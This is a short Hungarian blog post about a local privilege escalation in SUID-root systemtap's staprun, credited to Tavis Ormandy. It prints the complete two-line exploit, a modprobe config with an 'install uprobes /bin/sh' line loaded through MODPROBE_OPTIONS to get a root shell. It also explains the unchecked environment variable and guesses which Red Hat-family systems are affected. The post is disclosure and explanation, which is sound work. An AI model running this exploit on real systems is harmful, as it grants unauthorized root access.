Az utóbbi időben sokat volt szó Windows-okat érintő, jogosultságkiterjesztésre alkalmas problémákról, az egyensúly jegyében ma Tavis Ormandy újabb egy-, najó, kétsoros gyöngyszemét ajánlanám a figyelmetekbe:
printf "install uprobes /bin/sh" > exploit.conf
MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
A probléma gyökere, hogy a SUID roottal futó systemtap (staprun) nem ellenőrzi a MODPROBE_OPTIONS környezeti változó beállítását mielőtt egy modprobe-t hívna. Ebben a változóban megadható egy egyéni konfigurációs állomány a modprobe számára, melyben egy install primitívvel tetszőleges parancs végrehajtható (részlet a modprobe.conf manjából):
install modulename command...
This is the most powerful primitive: it tells modprobe to run your command instead of inserting the module in the kernel as normal. The command can be any shell command: this allows you to do any kind of complex processing you might wish.
A probléma a Reh Hat Linux különböző változatait érinti, de nem lennék meglepve ha a CentOS vagy a Fedora is érintve lenne - utóbbihoz tartozó csomag forráskódjában greppelve nem találtam utalást a kérdéses környezeti változó eltávolítására.